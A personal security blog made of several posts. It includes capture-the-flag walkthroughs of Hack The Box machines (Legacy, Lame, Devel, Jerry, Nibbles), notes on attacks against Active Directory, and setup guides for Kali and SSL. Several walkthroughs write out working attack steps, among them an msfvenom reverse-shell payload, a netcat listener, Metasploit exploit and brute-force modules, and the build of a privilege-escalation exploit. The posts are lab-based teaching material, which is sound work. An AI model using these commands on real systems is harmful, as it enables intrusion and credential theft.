Summary of Initial Attack Vectors to Active Directory

In this blog post, I will describe the following three attack vectors to Microsoft Active Directory: LLMNR Poisoning, SMB Relay Attack and IPv6 Attack.

In this blog post, I will describe the following three attack vectors to Microsoft Active Directory: LLMNR Poisoning, SMB Relay Attack and IPv6 Attack. These notes of mine come from the online course “Practical Ethical Hacking” by Heath Adams (aka The Cyber Mentor) where we disabled Windows Defender for demonstrative purposes.

Active Directory Initial Attack Vectors

LLMNR Poisoning

This attack misuses the Link-Local Multicast Name Resolution (LLMNR). LLMNR is a protocol that allows name resolution without the requirement of a DNS server. It sends a request across the network asking all listening Network-Interfaces to reply if they are authoritatively known as the hostname in the query, thus providing a hostname-to-IP service.

This service can be exploited by setting up a node on the network that pretends to be whoever the query is looking for. The client requesting the information will trust whatever machine answers first, because the protocol specifies that all received responses are authoritative and trustworthy.

In our attack situation, the victim machine will request to connect to a non-existing file share and Windows will use LLMNR to identify this file server. Our attacking machine will reply to this request with Responder.py and Windows will send us the credential hash of the current user for that victim machine, thus disclosing those credentials.

Check out this post by Black Hills Information Security (BHIS) where they show how to disable LLMNR with AD Group Policy.

Afterthought: NBT-NS is another fallback mechanism for name resolution. This service is flawed by design and should be disabled too.

SMB Relay Attack

This attack extracts a user’s credential hash from a machine and relays it to another in order to get system access on it. In order for this to work, there are two requirements. The first requirement is that SMB message signing – that is, the process of validating the source of requests against a system’s SMB services – is not enforced. The second requirement is that the user, whose credentials we relay across, is a local administrator on the machine receiving the hash.

Before starting the attack, we check which machines on the network do not enforce SMB message signing. To do this we run an nmap scan (other scan solutions are available too). If under smb2-security-mode you read “Message signing enabled but not required”, then that machine is a potential target!

The SMB Relay attack is similar to LLMNR poisoning in that we are listening for resolution requests. However, this time we won’t dump the credential hash. Instead we will reflect user authentication attempts against systems on the network. The relay mechanism we use is called ntlmrelayx.py. When ntlmrelayx.py makes a successful connection, it dumps all the local hashes on the target machine.

In this video by BHIS, John shares with us why we have to relay the hash. Spoiler alert: Microsoft doesn’t let you reflect the hash back to the source system it came from.

IPv6 Attack

This attack abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server and redirecting traffic to an attacker specified endpoint, and by then exploiting the WPAD (Windows Proxy Auto Discovery) feature with the goal of relaying credentials and authenticating to various services within the network.

The most known implementation of this attack is called mitm6. It starts with listening to the requests for an IPv6 configuration via DHCPv6 that each Windows machine makes regularly. Then mitm6 replies to these requests and sets the attacker’s IP as the default IPv6 DNS server for the victim. This is very convenient, because Windows prefers IPv6 DNS servers over their IPv4 counterpart.

Now the victim machine will start querying for the WPAD configuration of the network1. As the location of this configuration is only requested via DNS, the victim will connect to the attacker machine which will prompt authentication. The credentials will be then relayed by ntlmrelayx.py to other services in the network. ntlmrelayx.py will dump all juicy information, such as a list of domain users by group, after a successful connection.

This dumped html file lists the domain users by group. In the list, we see the SQL Service which has its own password in plain text under Description.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

Brute force SSH attack on HTB Nibbles

I will show you how to automate a brute force attack on SSH with the help of Metasploit.

In this blog post, I will show you how to automate a brute force attack on SSH with the help of Metasploit. The methodology that I present here can be used in a penetration test to check if the credentials of any SSH login are strong enough and, perhaps more importantly, to understand whether the blue team detects our brute force attacks.

In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Nibbles’s IPv4 address. Here we can also see that this is a Linux machine.

We first scan the target machine in order to identify open ports and services running behind those ports.

Ports 22 (SSH) and 80 (HTTP) are open on Nibbles.

Ports 22 (SSH) and 80 (HTTP) are open. In this post I will focus on SSH, even if HTTP is the way in for this machine1.

Brute force SSH attack

We Google search “openssh 7.2p2 exploit”. From the results, we learn that we can enumerate users on an OpenSSH server using a malformed packet or timing attack. The idea here is to enumerate the users on this SSH server and then combine this list with common SSH passwords in order to run an automated brute force SSH attack.

To enumerate the users we will use the auxiliary/scanner/ssh/ssh_enumusers module on Metasploit with unix-users.txt as user list. Moreover, we will log the output of this module for later processing.

msfconsole

use auxiliary/scanner/ssh/ssh_enumusers

set rhosts 10.10.10.75

set user_file /usr/share/wordlists/metasploit/unix_users.txt

spool /root/Documents/nibbles/ssh_enumusers.log

run

We now extract the usernames from the log file with grep and save the output in ssh-users.txt

grep -v "not" ssh_enumusers.log | awk '{ if ($6 == "User") { print substr($7,2,length($7)-2) } }' > ssh-users.txt

We found 30 valid usernames on the SSH server of this machine.

The next step is to download a list of common SSH passwords and combine it with the username list that we already have. We first download this list which contains 21 passwords (even if the file name says 20). Then we run my shell script (s. screenshot below) to combine each username with each password. Each entry will be on its own line, and each username and password pair will be separated by a space.

This script combines each username to each password from the two original lists.

We then make this script executable with chmod 744 combi-usernames-passwords.sh and run it. The new list, which is saved in users-passwords-ssh.txt, contains 630 credential pairs. Now we will use this list to run the Metasploit’s module auxiliary/scanner/ssh/ssh_login which will brute force the SSH login.

msfconsole

use auxiliary/scanner/ssh/ssh_login

set rhosts 10.10.10.75

set stop_on_success true

set verbose true

set userpass_file /root/Documents/nibbles/users-passwords-ssh.txt

run

After some minutes, this module will terminate without having found a valid combination. This is fine as we only used 21 SSH passwords. If this were a pentest, we would expect the blue team to detect our attack as we made a lot of noise banging on their doors.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

HTB Jerry: Default credentials made this hack a piece of cake

I will explain how I hacked into the Jerry machine on Hack the Box. This hack was made easy by a combination of information disclosure, poor hygiene and use of default credentials.

In this blog post, I will explain how I hacked into the Jerry machine on Hack the Box. This hack was made easy by a combination of information disclosure, poor hygiene and use of default credentials.

In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Jerry’s IPv4 address. Here we can also see that this is a Windows machine.

We first scan the target machine in order to identify open ports and services running behind those ports.

nmap -A -T4 -p- 10.10.10.95

The scan shows that port 8080 (HTTP) is open. Moreover, we learn that Apache Tomcat 7.0.88 is running on this server. This information will be useful later in this hack.

Open your browser and go to 10.10.10.95:8080 . We see a default page, which is a sign of poor hygiene. Moreover, we also see a link to the manager webapp, which could help us getting access to the server. Let’s click on the link.

The default page of Apache Tomcat/7.0.88 provides the link to the manager webapp.

We are asked for login credentials. We click on cancel and we are redirected to 10.10.10.95:8080/manager/html . Here we get a 403 Access Denied. However, this page offers us a set of default credentials. As this website has poor hygiene, we will try to login with them.

The “403 Access Denied” page provides a set of default credentials.

It worked, we are on the manager page. On this page, we learn that the OS is Windows Server 2012 R2 with amd64 architecture. Moreover, we see that we can upload a WAR file and deploy it. This looks juicy.

We are able to login with those default credentials. We see that we can upload and deploy a WAR file from this page. Let’s see if we can exploit this!

Exploit Jerry

Open your browser and google “war file for tomcat 7.0.88 exploit”. After a bit of research, the multi/http/tomcat_mgr_upload exploit on Metasploit seems to be the best solution for our use case. We are going to use the default payload java/meterpreter/reverse_tcp (a staged payload) this time.

set rhosts 10.10.10.95

set lhost <Your IPv4 address>

set rport 8080

set HttpUsername tomcat

set HttpPassword s3cret

We get a shell and we have access to the Administrator folders and files.

Boom, we are in! Even if it doesn’t say NT AUTHORITY\SYSTEM, we have access to the Administrator account nevertheless! Now you just have to find the two flags. I leave this task as a challenge for you. Tip: they are both in the same folder this time.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

How I became root on HTB Devel without Meterpreter

Heath Adams challenged his students to get root on HTB Devel without using Meterpreter. I accepted that challenge and succeeded! This is the report of how I did it.

Heath Adams challenged his students to become root on HTB Devel without using Meterpreter1. I accepted that challenge and succeeded! This is the report of how I did it.

In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Devel’s IPv4 address. Here we can also see that this is a Windows machine.

We first scan the target machine in order to identify open ports and services running behind those ports.

nmap -A -T4 -p- 10.10.10.5

The scan shows that the machine has two open ports:

  • FTP (21): We notice that anonymous FTP login is allowed. This tells us that we can upload files to the web server. Moreover, we can see some files here as well. It seems like it is a web root directory.
  • HTTP (80): We learn that the http-server-header is Microsoft IIS/7.5. If this were a pentest, this would be a finding as this is information disclosure. Moreover, we also get to know that the http-title is IIS7. This indicates that we are dealing with a default web-page.

The first thing we do for this enumeration is visiting the website 10.10.10.5.

10.10.10.5 shows a default web-page.

As our scan suggested, we are dealing with a default web-page. A default web-page indicates poor hygiene. What else did the website developer mess up? We look for extra directories by doing directory busting with DirBuster.

We brute-force directories on http://10.10.10.5:80 with DirBuster. We use the small list of lowercase words provided by Kali in /usr/share/wordlists/dirbuster and we look for asm, asmx, asp, aspx, txt, zip, bak, rar files.

DirBuster does not return anything interesting. The next step is to understand if we can execute files uploaded via FTP on the target. In order to do this, we first create a text file called test.txt on our Kali machine in which we write “test FTP”. Then, we connect to the target via FTP and upload this file. Now we navigate to 10.10.10.5/test.txt in the web-browser. Wow! We can see “test FTP” being displayed. This means that the server read our file and executed it.

Create test.txt with content “test FTP” on your Kali machine. Now enter the following commands in the Kali terminal (> separates the commands): ftp 10.10.10.5 > (enter username) anonymous > (enter password) anonymous > put test.txt . Then navigate to 10.10.10.5/test.txt and press Enter.

Exploit Devel with a Windows payload

In this section, our goal is to get a reverse shell through FTP. Firstly, we will create a Windows payload with Msfvenom2 and save it into an aspx file. Then we will upload this file to the Devel machine via FTP and, after having set up a listener with Netcat, execute it.

We save the Msfvenom payload list into venom-payloads.txt and grep this file for windows/shell3 payloads.

msfvenom -l payloads > venom-payloads.txt ; grep windows/shell venom-payloads.txt

There are two payloads that are interesting for us: windows/shell/reverse_tcp and windows/shell_reverse_tcp. The first is a staged payload, whereas the second is a non-staged payload. The difference between the two is well-explained in this table:

This table was taken from Heath Adams’s “Practical Ethical Hacking”.

The staged payload did not get me in. For this reason, I will show you how to get a reverse shell by using the non-staged payload.

We create the payload and save it into ex_shell_ns.aspx :

msfvenom -p windows/shell_reverse_tcp LHOST=<Your IPv4 address> LPORT=4444 -f aspx > ex_shell_ns.aspx

We then load this file to the Devel Machine via FTP:

ftp 10.10.10.5

anonymous (This is the username)

anonymous (This is the password)

binary (Set the transfer type: Binary instead of ASCII)

put ex_shell_ns.aspx

We also open a new terminal tab and set up a listener with Netcat, where -n stands for numeric-only IP addresses, -v for verbose, -l for listen mode for inbound connects, and -p for local port number (in this case, port 4444):

nc -nvlp 4444

Finally, we open 10.10.10.5/ex_shell_ns.aspx in our browser and we get a shell!

After running our payload on the website server, we get a shell on the target machine. However, we are not root.

Unfortunately, we are not root on this machine yet.

Post-exploit enumeration and Windows privilege-escalation

In this section, our goal is to become root on the target machine. This action is called privilege-escalation, as we have a non-root shell already. Before running this attack, we need to do post-exploit enumeration in order to find a working exploit for this specific machine.

First, we get some information on the target machine.

findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”

This is a Windows 7 machine (version 6.1.7600) with x86 architecture. Let’s google “windows 7 (6.1 build 7600) exploit”. Among the results, this exploit is the most interesting: “An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges).” The only prerequisite is “low privilege access to the target OS”. No problem, we have this already. Let’s go ahead and use it.

We download the C source code to our Kali machine and save it as MS11-046.c and compile it as a 32-bit payload with mingw4:

i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

Now we have to make MS11-046.exe accessible on the target machine. To do this, we launch an smbserver with Python on Kali:

mkdir smb

cp /usr/share/windows-resources/binaries/nc.exe smb/

mv MS11-046.exe smb/

smbserver.py share smb

We successfully started an smbserver with Python.

Now we go back to our shell on the target and run MS11-046.exe :

We run \\<Your IPv4 address>\share\MS11-046.exe on the target and we become root.

We are now the root user on the machine Devel! Now you just have to find the two flags for users root and babis. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

How I hacked the Linux machine Lame on HTB

In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).

In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).

Lame is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.

I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Lame’s IPv4 address. Next to the machine name, we see Tux the penguin and thus know right away that this is a Linux machine.

The first step for this hack is to scan the Lame machine in order to identify its open ports. We run nmap -A -T4 -p- 10.10.10.3

We scan for open ports and we get all the information available on the services that are running behind those ports.

The result shows us that there are five open ports and four services running behind them:

  • FTP (21): File Transfer Protocol. nmap shows that anonymous FTP login is allowed. This would be a finding if this were a penetration test. Anonymous FTP login should not be allowed in general. Using this information, we could connect to the machine via FTP and list the files in the FTP directory. Alternatively, we could check if vsFTPd version 2.3.4 is exploitable.
  • SSH (22): Secure Shell. We could try a brute force attack on SSH. If this were a penetration test, this would show us how good the password policy is and whether the blue team is able to detect us.
  • DISTCC (3632): I had to Google what DISTCC is. According to this post, this service “is designed to speed up compilation by taking advantage of unused processing power on other computers”. Here we could check whether DISTCC v1 is exploitable.
  • SMB (139/445): This is the service that we targeted in our attack on the Windows machine called Legacy. nmap shows that Lame is running Samba 3.0.20-Debian. This is the service that we will target today.

Firstly, we run smbclient -L \\\\10.10.10.3\\

We have access to the share names.

The result in the screenshot tells us that can list the share names without having a password, because anonymous login is allowed on SMB. This is a juicy finding. If we were able to get into ADMIN$, we would have very good chances of exploiting this machine. Run smbclient \\\\10.10.10.3\\ADMIN$

We cannot access the ADMIN share.

Unfortunately, access to this folder is denied (same result for print$ and opt$, whereas we can get access to IPS$ but we cannot neither ls nor cd). The remaining folder is tmp. Here we do not get access to vmware-root, and files .X0-lock and vgauthsvclog.txt.0 do not contain interesting information. PS: I downloaded these files on my machine with smbget -R smb://10.10.10.3/tmp, as cat didn’t work on SMB.

Now open your browser, go to Google and search samba 3.0.20-debian exploit. We open the Rapid7 page called usermap_script. This page explains that using the non-default “username map script” configuration option, we can specify a username containing shell meta characters and then execute arbitrary commands. Moreover, no authentication is needed. This is what we were looking for.

Exploit Lame and Catch the Flags

Enter use exploit/multi/samba/usermap_script , set rhosts 10.10.10.3 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!

We are root on Lame!

We are in! We are the root user on the machine Lame. Now you just have to find the two flags for users root and makis. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

Legacy! How I hacked my first machine on HTB

In this blog post, I will show the steps that I took to get root access to the Legacy machine on Hack The Box (HTB).

In this blog post, I will show the steps that I took to get root access to the Legacy machine on Hack The Box (HTB).

Legacy is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.

I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.

Create a Connection to the HTB Network

In order to connect to the HTB network, open a terminal tab, go to the folder where you downloaded the connection pack, type openvpn <yourUsername>.ovpn. If you see the line Initialization Sequence Completed, you are good to go. Now open a new terminal tab and type ifconfig. You should see an entry called tun0, which is the name of the VPN interface. Write down the relative IPv4 address, we will need it later.

Scanning and Enumeration

In real life, the first step for a penetration test is information gathering. During this phase, the pentester gathers information about the target. Because we are hacking a machine on HTB, we will limit ourselves to write down Legacy’s operative system (Legacy is a Windows machine) and its IPv4 address. This information can be found at https://www.hackthebox.eu/home/machines under Retired Machines > Legacy.

The next step of the pentest process is scanning and enumeration. Here the pentester wants to know which ports on the victim machine are open, that is, which ports are configured to receive packets. Moreover, s/he looks at the services listening on those ports, looks for unpatched vulnerabilities and so on. For scanning and enumeration we are going to use nmap, smbclient (spoiler alert: we are going to exploit a SMB weakness) and metasploit.

Open a new terminal tab and enter nmap -T4 -p- 10.10.10.4 . With this command, we are going to scan all ports on machine 10.10.10.4 (Legacy) with timing 4 (timing is in range 0-5, where higher is faster).

We just look for open ports as first step.

This first scan tells us that ports 139/445 (SMB) and 3389 (RDP) are open. Now that we know this, let’s list more information about them. Enter nmap -A -T4 -p 139,445,3389 10.10.10.4 , where -A lists all the information available for each specified port.

Now we get more information for ports 139/445 and 3389.

The most important information that we get from this second scan is that the target computer is running Windows XP (you see this information under smb-os-discovery).

Now we will focus on SMB which is a network file sharing protocol that has been vulnerable on Windows in the past. Our goal is to gather information about SMB on this machine. The first thing we can do is try accessing SMB resources on the target. Enter smbclient -L \\\\10.10.10.4\\

Our goal is to access SMB file shares on Legacy.

This attempt was unsuccessful, because the login is protected by a password. The next thing we can try is to find out which SMB version Legacy is running. In order to do this, we will use Metasploit. Run msfconsole to start the service. Then enter search smb. As we are looking for the SMB version, we enter use auxiliary/scanner/smb/smb_version. Now we set up the remote host with set rhosts 10.10.10.4 and run this program.

We scan in order to find out the SMB version.

Unfortunately, we do not get any information about the SMB version, but we get to learn that the host is running Service Package 3 of Windows XP. This is an important finding, because it allows us to look for an exploit for a specific service pack.

Now open your browser, go to Google and search smb windows XP SP3 exploit. One of the first pages that show up is https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi . Rapid7 pages are very helpful as they explain the specific vulnerability and show you the commands that you have to run with Metasploit in order to exploit that vulnerability. The reason behind this “service” is that the Metasploit Project is a collaboration between the open source community and the company Rapid7.

Exploit Legacy and Catch the Flags

It is time to hack into Legacy. In this exploit, we are going to open a reverse shell. This means that the victim connects back to us (the attacker). This image by https://www.hackingtutorials.org/ visualizes this concept:

The idea behind a reverse shell.

Enter use exploit/windows/smb/ms08_067_netapi and then set up RHOST (the victim’s IP address) and LHOST (the attacker’s IP address). This step is very important as the default settings use your machine default IP address as LHOST (it took a while for me to find this problem), whereas you need the tun0 IPv4 address in order to hack into Legacy successfully. Enter set rhosts 10.10.10.4 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!

The exploit was successful and we are now NT AUTHORITY\SYSTEM.

If everything worked fine, you should see something similar to the screenshot above. NT AUTHORITY\SYSTEM means that we now have the highest privilege level in Windows, which is equivalent to the root user in Linux. Next you have to look for user “john”‘s and user “Administrator”‘s flags and submit them on HTB in order to own the Legacy machine. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

Efficient Kali and Kioptrix setup on VirtualBox for scanning and enumeration

This blog post shows an easy way to set-up both Kali and Kioptrix on VirtualBox for scanning and enumeration.

This blog post shows how to set-up Kali and Kioptrix on VirtualBox for scanning and enumeration. I feel that this post is necessary, because the many how-to instructions on the Internet about this topic either don’t work or are unnecessarily complex.

I assume that you have already:

Create a new virtual machine for Kioptrix Level 1

Open VirtualBox, click New and then Expert Mode.
Enter the VM name, select Linux as Type, 2.2 as Version, and 256 MB for memory size. Select “Use an existing virtual hard disk file” and select the .vmdk file from the folder you unzipped before.
Disable USB controller and audio.
Start the Kioptrix VM and you should see this welcome screen. Now power off this machine before beginning with the next step.

Modify default network settings

Select File > Preferences > Network. Then click on the icon on the right with the green plus in order to add a new NAT Network.
Right click on the new NAT Network. Here I modified the CIDR to 192.168.1.0/24 (default was 10.0.2.0/24). Click OK two times.
Select the Kali VM, click on Settings > Network. Change “Attached to” from “NAT” to “NAT Network”. Under “Name” select the NAT Network that you created in the previous step. Select “Advanced” and under “Promiscuous mode” select “Allow All”.
Select the Kioptrix VM, click on Settings > Network. Change “Attached to” from “NAT” to “NAT Network”. Under “Name” select the NAT Network that you created in the previous step. Select “Advanced” and under “Promiscuous mode” select “Allow All”.
Start both VMs. In Kali, type ifconfig and note down your IPv4. Login into Kioptrix with username=john and password=TwoCows2 and ping 8.8.8.8. The IPv4 for this machine should be different from the one for the Kali machine.

Discover Kioptrix from Kali with netdiscover

Now your Kali VM should be able to discover your Kioptrix machine. Type “netdiscover -r <ip-range>” where <ip-range> is the network CIDR.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

How to change default credentials in Kali from the terminal

This blog post will explain how to change default credentials in a Kali Linux virtual machine after spinning it from a 2020.3 OVA image.

This blog post will explain how to change default credentials in a Kali Linux virtual machine (VM) after spinning it from a 2020.3 OVA image1.

Since release 2020.1, Kali uses a non-root user policy by default. This means that the default credentials for a pre-created image are2:

  • username: kali
  • password: kali

Running a machine with default credentials is like leaving your house door unlocked at night in a bad neighborhood. Let me show you how to lock this door properly.

We will first change root and kali passwords, and then rename the default user together with its home directory and group.

Login with the default credentials, pretend to be root, and change root password:

Change password for root

BONUS: su let’s you pretend to be root (you are still in your home directory), whereas su - makes you root (you are in ~, that is, root home directory).

Difference between su and su -

Now change the password for kali too by typing passwd kali. The process is the same as the one in the image above. Now log off and log in again as root.

Rename the default user with your username3:

Kill the processes that are using the user kali and then rename it

Make sure that the renaming was successful:

Read the last 10 lines of the file /etc/passwd and make sure that the renaming was successful

Rename the home directory4:

Rename the home directory for savvy_learner

Rename the group:

Rename the group for savvy_learner

Check if the changes were successful:

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

How to verify the integrity and authenticity of a Kali Linux OVA image

You downloaded an image to install Kali Linux and you want to make sure that this file is an integral and authentic copy? This post is for you!

You have downloaded an image to install Kali Linux1 as a virtual machine (VM) on your hypervisor and you want to make sure that this file is an integral and authentic copy? If the answer to this question is yes, keep reading! In this blog entry, I will describe how to verify the integrity and authenticity of a Kali Linux OVA image with Windows 10.

There are two ways to install Kali Linux on a virtual machine. The first is to create a new VM and manually configure it on the hypervisor2. Once this is done, the Kali ISO image3 needs to be attached to the virtual CD-ROM and then the VM can be booted. The second method is to import a copy of an existing virtual machine into the hypervisor. Such copy is distributed as an OVA4 package, which is an archive file that contains metadata for the VM – such as name or hardware requirements – and at least one disk image, among other things. Before importing the OVA image into the hypervisor, we need to make sure that this file wasn’t damaged during the download and perhaps more importantly that this is an authentic copy. This process is what I present next.

The first step of this process is to download the OVA image. In order to do this, go the official website of Offensive Security5: https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/. Here you should choose the OVA image compatible with your hypervisor. As I use VirtualBox6, I downloaded the VirtualBox 64-bit file. While downloading, take note of the checksum (SHA256Sum) written next to the file that you selected:

OVA images and SHA256Sums on offensive-security.com

The next step is to open the Windows PowerShell and cd7 into the directory where you saved the OVA image. Here run the following command (modify it with the name of the file that you downloaded): Get-FileHash kali-linux-2020.3-vbox-amd64.ova -Algorithm sha256. If everything worked well, you should see something like this:

Get the hash from the OVA file

The alphanumeric string under the column Hash is the information we need to compare to the SHA256Sum that we took note of before in this tutorial. As I’m lazy – and thus efficient 😀 – I did this with the Python Shell (see Screenshot below; modify the command with your checksum data). If the result of running this command is True, you are ready to go8:

How I made my website more secure

I will describe how I made my website more secure by integrating a free SSL certificate into my WordPress website with the Really Simple SSL plugin.

In this post, I will describe how I made my website more secure by integrating a free SSL1 certificate into my WordPress website with the Really Simple SSL plugin. Before doing that, I will give a brief introduction about how data is transferred over the Internet, and why encrypting and signing that data is very important.

Data over the World Wide Web is transferred with the HTTP (Hypertext Transfer Protocol) protocol2. HTTP messages can be categorized in two main groups: requests and responses. I will now briefly describe what HTTP requests and responses are.

An HTTP request is generated when a user interacts with their web-browser (e.g., Firefox). For example, when a user enters info.cern.ch in their URL bar and press enter, their browser will send a series of HTTP GET requests in order to get the information necessary to render that page.

The image here below, which I took while monitoring my WiFi traffic with Wireshark,3 shows how such a request looks like:

Example of an HTTP GET request

HTTP requests go to a server4 and that server generates an HTTP response which looks similar in its form to an HTTP request. As you can see, HTTP responses and requests are sent across the Internet as plain text. This means that any data, sensitive data included, that users send or receive can be read by anyone who is monitoring the session. Another problem with HTTP is that the recipient of a message cannot be confident that the message was sent by the legitimate sender, and that it hasn’t been changed while in transit.

The solution to this problem is called HTTPS, where the S stands for secure. HTTPS uses TLS/SSL5 to encrypt HTTP requests and responses. In this way, anyone monitoring your traffic will only see gibberish. Moreover, TLS/SSL signs your data. Both these results are achieved by using public and private keys6.

This is how a TLS/SSL encrypted HTTP request sent to my own website looks like when monitored with Wireshark:

Example of an HTTP over TLS request

My website didn’t have HTTPS when I opened it. In order to provide secure communication from/to my website server, I first got hold of an SSL certificate and then integrated it into my WordPress website using the Really Simple SSL plugin.

An SSL certificate is a data file hosted on a website’s origin server. It is what enables websites to move from HTTP to HTTPS7. It is possible to obtain a SSL certificate from Let’s Encrypt8 for free. Let’s Encrypt certificates need to be renewed every 90 days.

In order to request a Let’s Encrypt SSL certificate I first had to connect to my server via SSH9. After updating the packages on my instance, I installed Certbot – a client used to request a certificate from Let’s Encrypt and deploy it to a web server.

The next step was to request a Let’s Encrypt SSL wildcard certificate10. In order to do so, I had to prove that I owned the domain I asked a certificate for. I did this by adding TXT records to the DNS records of my domain. Once the TXT records had been propagated to the internet’s DNS, I completed the Let’s Encrypt certificate request.

As Certbot saved my SSL certificate, chain, and key files into /etc/letsencrypt/live/michelepariani.com/, I created links to these files in the Apache directory11 on my server.

Finally, I installed the Really Simple SSL plugin on my WordPress website and used it to integrate the SSL certificate with a few clicks on the website admin page.

A detailed tutorial about the steps described above can be found here: https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-using-lets-encrypt-certificates-with-wordpress.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!